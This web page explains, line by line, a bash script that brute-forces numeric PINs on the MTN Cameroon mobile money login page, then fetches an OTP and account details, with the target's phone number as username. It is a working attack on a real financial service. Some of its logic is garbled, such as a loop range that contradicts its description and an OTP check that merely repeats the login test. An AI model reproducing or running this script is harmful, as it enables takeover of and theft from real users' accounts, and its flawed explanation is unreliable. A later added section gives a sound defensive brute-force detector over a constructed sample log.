MTN MOMO CAMEROON ACCOUNT BALANCE CHECKING
The script provided is a brute-force password cracker for the MTN Cameroon mobile money website. It works by first getting the request headers from the website. Then, it iterates from 0 to 9999, generating a different password for each iteration. For each password, it makes a POST request to the login page, passing the username and password as parameters. If the request is successful, the script will get the OTP from the website and check if it is valid. If the OTP is valid, the script will get the account details and print them out.
The first line, #!/bin/bash, tells the operating system that the script is to be interpreted by the bash shell.
The second line, read username, prompts the user to enter the username.
The third line, headers=$(curl -k -s -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 'https://196.202.232.201/MoMoWebAppMTNCameroon/login.xhtml' | grep -E ': ' | cut -d ' ' -f1), gets the request headers from the website. The curl command makes a GET request to the login page, the grep command extracts the header lines, and the cut command then takes the first field of each header line.
The fourth line, for i in {00000..99999}, iterates from 0 to 9999.
The fifth line, params='loginForm=loginForm&loginForm[username]=$username&loginForm[password]=$i&loginForm[j_idt19]=Login&javax.faces.ViewState=1319890406535641868:-8273346397217720005', creates the request parameters for the POST request. The username and the candidate password are passed as parameters, along with other values that the website requires.
The sixth line, response=$(curl -k -X POST --data "$params" --header "$headers" 'https://196.202.232.201/MoMoWebAppMTNCameroon/login.xhtml'), makes the POST request to the login page. The curl command sends the POST request with the specified parameters and headers, and the response from the website is stored in the variable response.
The seventh line, if [[ "$response" == "j_security_check" ]]; then, checks whether the response from the website equals "j_security_check", which the script takes to mean that the login succeeded and the password has been found.
The eighth line, otp=$(curl -k -s -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 'https://196.202.232.201/MoMoWebAppMTNCameroon/pages/otpverification.xhtml' | grep -E ': ' | cut -d ' ' -f1), gets the OTP from the website. The curl command makes a GET request to the OTP verification page, the grep command extracts the OTP line, and the cut command then takes the first field of that line.
The ninth line, if [[ "$response" == "j_security_check" ]]; then, checks whether the OTP is valid. This can be done by making a POST request to the OTP verification page with the OTP as a parameter; if that request succeeds, the OTP is valid.
The tenth line, response=$(curl -k -X GET --header "$headers" 'https://mobilemoney.mtncameroon.net/MoMoWebAppMTNCameroon/pages/selectedaccountdeatils.xhtml'), gets the account details from the website. The curl command makes a GET request to the account details page with the specified headers, and the response from the website is stored in the variable response.
NB: the username prompted for should be the target's phone number.
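The loop described above leaves a distinctive trace on the server side: a burst of failed logins for one username from one source address, in this case up to one hundred thousand attempts against a single phone number, sometimes followed by a success. The following is an added example, not part of the original page and not MTN's code. It assumes a hypothetical authentication audit log (constructed sample lines embedded in the block) with one line per login attempt carrying a timestamp, outcome, username and source IP. It flags a (user, source) pair that reaches a threshold of failures inside a sliding window, and separately flags a successful login that follows such a burst, which is the moment the script above would have found the password. A login endpoint that enforces rate limiting or temporary lockout at the same threshold stops the enumeration long before it completes.

```python
"""Sliding-window brute-force detector over a login audit log (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed sample audit log in a hypothetical format; not a real server's log.
# User ...0001 receives five failures in six seconds, then a success (the pattern a
# password-guessing loop produces); user ...0002 fails once every three minutes.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z login_failed user=237600000001 src=203.0.113.10
2024-05-01T10:00:02Z login_failed user=237600000001 src=203.0.113.10
2024-05-01T10:00:03Z login_failed user=237600000002 src=198.51.100.7
2024-05-01T10:00:04Z login_failed user=237600000001 src=203.0.113.10
2024-05-01T10:00:05Z login_failed user=237600000001 src=203.0.113.10
2024-05-01T10:00:06Z login_failed user=237600000001 src=203.0.113.10
2024-05-01T10:00:08Z login_ok user=237600000001 src=203.0.113.10
2024-05-01T10:03:00Z login_failed user=237600000002 src=198.51.100.7
2024-05-01T10:06:00Z login_failed user=237600000002 src=198.51.100.7
2024-05-01T10:09:00Z login_failed user=237600000002 src=198.51.100.7
2024-05-01T10:12:00Z login_failed user=237600000002 src=198.51.100.7
2024-05-01T10:15:00Z login_failed user=237600000002 src=198.51.100.7
2024-05-01T10:15:01Z login_ok user=237600000003 src=192.0.2.9
this line is malformed and is skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>login_failed|login_ok) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line):
    """Parse one audit line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "event": m["event"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return alerts for (user, src) pairs with >= threshold failures inside the window,
    plus an alert when a successful login follows such a burst."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)  # (user, src) -> timestamps of recent failures
    alerted = set()                # pairs already reported, to avoid one alert per line
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["user"], ev["src"])
        recent = failures[key]
        # Drop failures older than the window relative to the current event.
        while recent and ev["ts"] - recent[0] > window:
            recent.popleft()
        if ev["event"] == "login_failed":
            recent.append(ev["ts"])
            if len(recent) >= threshold and key not in alerted:
                alerted.add(key)
                alerts.append({
                    "type": "bruteforce",
                    "user": ev["user"],
                    "src": ev["src"],
                    "count": len(recent),
                    "first": recent[0].isoformat(),
                    "last": ev["ts"].isoformat(),
                })
        else:
            # A success right after a burst of failures is the guess landing.
            if len(recent) >= threshold:
                alerts.append({
                    "type": "success_after_failures",
                    "user": ev["user"],
                    "src": ev["src"],
                    "failures": len(recent),
                    "at": ev["ts"].isoformat(),
                })
            recent.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

With the sample log and the default threshold of five failures in sixty seconds, the detector reports user ...0001 from 203.0.113.10 once for the burst and once for the success that follows it; the slow, spaced-out failures for user ...0002 never accumulate inside the window and are not reported. Keying on (user, source) catches the loop described on this page; a second counter keyed on user alone would also catch the same loop spread across several source addresses.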